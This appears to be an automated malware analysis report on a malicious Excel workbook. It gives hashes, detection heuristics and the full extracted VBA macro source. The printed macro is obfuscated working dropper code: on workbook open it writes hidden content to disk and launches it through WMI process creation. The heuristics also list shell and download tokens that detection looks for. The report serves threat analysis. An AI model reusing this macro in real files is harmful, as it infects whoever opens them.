Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 29454692e8325328…

MALICIOUS

Office (OOXML) / .XLSX

Size: 183.4 KB
Created: 2021-03-22 13:13:29 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2022-07-13
MD5: 230aaf5029e89ab1b99a03cd7b8ce361
SHA-1: e18fe2b95f5aeb34e7b4736d6c89b71307d00148
SHA-256: 29454692e832532818525a9a61453f95a2dd9e7b3adb9c794295db377420ba38
Risk Score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of a GetObject call and p-code auto-execution further indicates malicious intent. The script's obfuscated nature and truncated content prevent a definitive analysis of its exact payload, but the overall pattern suggests it's designed to download and execute a secondary malicious component.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 3 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script
    Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8439 bytes
SHA-256: 275054aa8ec129c8e42e57802dc36607e01dc1168415e78d832e7e1e702e6c90
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BTSmHc_0HEZmv = IsError(IsError(hfa9mGb))
IsArray (IsDate(XVt8YS))
SwIOWWI = IsMissing(IsNumeric("WNwwBiH"))
lOqWUpdEspdvLsbu.s_i_F_zogoHJF_QwGHD
IsMissing (IsArray(EGQllY6))
IsDate ("UXbYPF_Sfp9Qd")
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "lRdQ_mtBs"
Function kq_aDivOmaPBNgXoNH_ZZFdVw()

s2z1nec_vEz0Pg = IsDate("W9mPqe_poJkR")

IQSAEoEbdK30K = IsObject(wOuVeV_ImyuDn)

IsNull (IsDate(GsqS0S))

kq_aDivOmaPBNgXoNH_ZZFdVw = Range("FM125")

v9j2X6_oeUrXf = IsDate(IsNumeric("c8t5Xxb_pVSR0Y"))

MJXbzqb = IsEmpty("vM5dck1_WgVOV")

IsEmpty ("QEwqVWP_7wTvv")

End Function

Function aODjNGONvsH()

wuLow7 = IsArray(tjoZL5)

l9vLq9 = IsDate(IsArray("G2MFCzd"))

vcmSOSwEmOQp = Chr(CLng((Not -103))) _
 
IsNull (IsNull(G2SazMC))
gkn_mBrlMwcflnwtxuA = Chr(CLng((Not -33))) _
 
xHWHsoDqLfxolJxaPpOyPygqf = Chr(32)
Lr_wbEjNYjSINiJizp = Chr(CLng((((-876 + 31#) - -264#) - -697))) _
 
IsObject (IsDate("gqv7RS4jqguS"))
HkcVgZPJzeYyDF__pREYsRS = Chr(CLng((Not -115)))
IsNull (OcAlSZ)
dU_RPfrAAv = ChrW(116)
ZjLLgXe_fitdA = IsDate(uSuTQ1_sOn8k5)
GfNUSENs_EssE = Chr(58)
ZKgAXorw_hKYJa = Chr(CLng(((-1.06566820276498E-03 * (0.24390243902439 * 861)) * -496)))
sFrMWAI = Chr(CLng((Not (0.147692307692308 * (144 + -469#)))))
NISqumCQCJkxgWmrBOcGB_c = ChrW(CLng(((-0.508196721311475 * -61) Xor 124)))
kd3Lb0_L7NGI = IsMissing(IsNull(NjxfO1C))
nKrauOIJPOcnno_eJ_LNsH = Chr(CLng((-0.209503239740821 * -463)))
AzGgWz8_XrjWxI = IsDate(IsNumeric(YV2sUZ7_qnj3la))
yVhpl_K_YiPPX_LfwRrsC_bEJSwcW = Chr(CLng((503 - xlDialogChartAddData))) _
 
XKMY_DCehdlbH = ChrW(CLng((125 And xlPyramidBarClustered))) _
 
ZBYUhBIQRvcfh = ChrW(101)
Rt2kpLa7fNYeR = IsEmpty(IsDate("UfDfc6w_TbcqdT"))
aODjNGONvsH = ChrW(119) _
  + XKMY_DCehdlbH + ChrW(CLng(((-1075 - -740#) - -440))) + NISqumCQCJkxgWmrBOcGB_c + gkn_mBrlMwcflnwtxuA + ZKgAXorw_hKYJa + ChrW(CLng((-313 - -428))) _
  + xHWHsoDqLfxolJxaPpOyPygqf + Chr(103) + ZBYUhBIQRvcfh + dU_RPfrAAv + Chr(CLng(((1265 - 244#) + (-560 - 429#)))) + sFrMWAI + vcmSOSwEmOQp + yVhpl_K_YiPPX_LfwRrsC_bEJSwcW + HkcVgZPJzeYyDF__pREYsRS + ChrW(109) _
  + nKrauOIJPOcnno_eJ_LNsH + Lr_wbEjNYjSINiJizp + GfNUSENs_EssE

YJPkQQ = IsMissing(IsObject("xcXzU3_H0VKRQ"))

IsMissing (EpO4HUseDIzsQ)

IsMissing (IsNumeric("lYw16b_B1otN"))

End Function


Attribute VB_Name = "sYOpFddrVYp"
Function ihtkTUBPUpLFqNviPkhajZT()

IsNull (IsNull(OSlm0e))

IsDate ("IoY4Trx")

cOEZTzkDYPfhH = IsObject(rsrGo1U0fXc)

IsError (IsNumeric("hnVhdBgF6o23x"))

IsEmpty (IsError(RMzj0G))

IsDate (IsObject(HfWT6Bc_oIWZRk))
aUDGLGqKn_QHDaJFrpXCYnuFgMw_h = lRdQ_mtBs.kq_aDivOmaPBNgXoNH_ZZFdVw
GTno0T = IsEmpty("Gkm8vB7Axyuf")
IsMissing ("Mgci3wzX5spH")
Twmdyh_iIL00M = IsMissing("M0JkCp_1zOvCP")
ihtkTUBPUpLFqNviPkhajZT = aUDGLGqKn_QHDaJFrpXCYnuFgMw_h

IsError (IsMissing(MerAtNuIUi2e))

IsObject (UUKlz1d)

IsArray ("GV4RDGv")

End Function

Function w_nVLDlp()

IsNumeric ("ecJpXrv")

IsDate (tMrvm6juM3w)

tZS07tC = IsDate(IsNumeric("ANj0tg0qLDRe6"))
jjEWMvpYolnCPH_cXgfIougCbze = Mid("VFiMTh\winmgmts:\root\cimv2:Win32_Pr<2iv)", 8, 29)
IsDate ("TlVm85h")
dHXd9i = IsArray(IsDate(YSuddc_dqR3wo))
IsArray ("VSb7cj")
IsError (IsNull("JEK8235_Ay1PT"))
ngPXnDG_nnLKxL = IsEmpty(BBznYjbtprh)
W4krvLj = IsDate("SmJJCXE_yo8RxB")
IsNull (IsDate("l0EMOe_b44DS"))
RFsmAEnwoQ = Range("CO77")
w_nVLDlp = Join(Array(jjEWMvpYolnCPH_cXgfIougCbze + RFsmAEnwoQ))

IsError (owdiSUY)

UOX20mnA9OT0 = IsMissing("UNG7BSo")

V9x4Ki_vy54oK = IsObject("WpXr16jnykmN")

End Function

Attribute VB_Name = "suZjjqhMIKKwO_XfJ_Np"
Attribute VB_Base = "0{6F4FE49F-E257-450C-A73F-3CFDF6F789DB}{F79837EC-6EC8-4426-AFBE-D63B94D0EA61}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function wPozVwdmPCyEXp()

L6lNSM = IsError(IsError("MMJbgGO"))

LA9cqFeN5LUE = IsEmpty(XqWEQawSgl15H)

IsError ("CPgp4isTujS")

Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_

IsArray ("X0updT_Uenzi")

IsDate (IsObject("pkwQS8"))

WNEIVhC = IsDate("yVwDZI_BH3LyQ")

With wPozVwdmPCyEXp

.ShowWindow = CLng(((-472 + 484#) Xor xlDataAndLabel))

End With

IsError (WpYzc3k652Qz)

fI7LHOkx2lUkE = IsError("Lg8bro")

YLAredV = IsNumeric(S60mxw_N0nSD)

End Function

Attribute VB_Name = "LAlDWGOQh_arnMxEPVSw"
Attribute VB_Base = "0{CD263F86-6132-4392-8A3C-34923620D19A}{AD82E8DB-79E2-4999-9815-8C7581EDF9EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function CmRyWYgMDoOOXfWblq_Y_r_dHlG()
IsEmpty (IsEmpty("FOjyjEc"))
IsDate ("NQXKvzl0ESO")
IsDate (IsDate(VsIjNK))
kWO9ncG = IsEmpty(BXdIK9_ZVwve)
IsEmpty (IsDate(FMvEFB))
FxcjEEIVgvsz = Chr(CLng((xlDialogActivate And xlDialogRowHeight)))
lqd_HWIuNky = ChrW(CLng((124 And 118)))
Y44putM = IsArray(IsNull("G4qJPt2lki3N"))
PP_BNPJV_P = Chr(118)
dtewQVe5pXIu = IsMissing(CUhhvk)
h_MxpribSNKmNsKxeqYOXRXIaEEkT = ChrW(92)
IsArray (DCFjxV)
B_MPcUiZfsnSMupY = ChrW(CLng((Not -59)))
NyCOxW = IsDate(IsMissing("NkHtt0"))
WZ6qwN = IsEmpty(IsEmpty("LlA1m0evJAC"))
CmRyWYgMDoOOXfWblq_Y_r_dHlG = ChrW(CLng((0.113225499524263 * ((0.699046754425783 * 2203) - 489#)))) + ChrW(105) + Chr(110) _
  + Chr(CLng((Not (xlDialogWorkgroup + (-1263 + 954#))))) + FxcjEEIVgvsz + ChrW(CLng((((-655 - -633#) + 735#) - 604))) _
  + ChrW(CLng((Not (-658 - -541#)))) + ChrW(115) + ChrW(CLng(((1213 + -340#) + (-941 - -126#)))) _
  + Chr(114) _
  + Chr(111) + Chr(CLng(((-1.25027455353372E-04 * -981) * 905))) + lqd_HWIuNky + h_MxpribSNKmNsKxeqYOXRXIaEEkT + ChrW(CLng((xlDialogFormulaFind - -35))) + Chr(CLng((xlExcel3 Xor 116))) + Chr(CLng(((xlDialogTabOrder - 297#) Xor (1.32013201320132E-02 * 909)))) + PP_BNPJV_P + ChrW(CLng((Not -51))) + B_MPcUiZfsnSMupY + Chr(CLng((-471 - -558))) + Chr(CLng((xlConeCol And xlDialogRowHeight))) + Range("HF116") + Replace(",/5cC,/5cC,/5cC,/5cCProcess", ",/5cC", "") _
 
IsMissing (IsDate("U7qekmk"))
MloBIOq_9fp5M = IsArray("GedR3Gf")
IsDate (IsArray("Bxq5GBb"))
End Function


Attribute VB_Name = "lOqWUpdEspdvLsbu"
Function s_i_F_zogoHJF_QwGHD()
Dim hqRREKewYDJToW_Pe_pG_IOaAqXxj As String
A2WOgLX_AMhn2 = IsMissing(IsEmpty("XegRZUZShB6"))
IsEmpty (IsDate("xIg4ogv"))
hqRREKewYDJToW_Pe_pG_IOaAqXxj = Replace(suZjjqhMIKKwO_XfJ_Np.Lk_MlbhdEixFU_ioQgheowZg.Text, "viXKLi;kOJt!", "")
Qslv4b_lyrmWE = IsEmpty(IsError("IO2OlE_jt1aVY"))
IsEmpty (DzFBzM)
ZhALScm_TBMak = IsMissing(OodALZ)
Open Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT For Binary As #CLng((xlSpeakByColumns Xor xlDone))
L0Qz8Efc1X9Jt = IsArray(IsDate(SgftKYh))
Z3e0YHKTlMi = IsMissing(IsNumeric(Vb6tqf_FMQzC1))
Put #CLng((xlArrowHeadLengthShort And xlArabicStrictAlefHamza)), , hqRREKewYDJToW_Pe_pG_IOaAqXxj
IsNull (IsEmpty("Tx8TXme"))
wDr3w0o = IsArray("Rh3Cx97_T0GCse")
Close #CLng(((xlDialogFileSharing + -570#) - -90))
IsEmpty ("g9ZDy8gjipKP")
IsNull (IsArray(D93cV5))
bNeQcrNhumRjV_pbFLQR_f
IsObject (IsDate(JWXxEB))
IsError (IsNumeric("Zy23jm_PREdgt"))
End Function
Function bNeQcrNhumRjV_pbFLQR_f()
PAH0U6F = IsDate(SN0jlRUa2fp5)
EmUbBmq = IsArray(IsObject("NU4nKG"))
IsError (IsNull(Rrceccx))
With GetObject(LAlDWGOQh_arnMxEPVSw.CmRyWYgMDoOOXfWblq_Y_r_dHlG)
.Create lRdQ_mtBs.aODjNGONvsH & Chr(34) & Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT & Chr(34), Null, suZjjqhMIKKwO_XfJ_Np.wPozVwdmPCyEXp
End With
IsNumeric (IsObject("Llm8Ukq"))
NnZXSAU = IsArray(JuWuijT)
ErB1uN8_e8eE1S = IsNull(IsMissing(xiKX72))
IsNull (IsError(egZDybRiGDVZ))
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes
SHA-256: 13e9bca0e36e93585fa70e507fa2b11f33ce395a1c52b32aac3bfde85968288b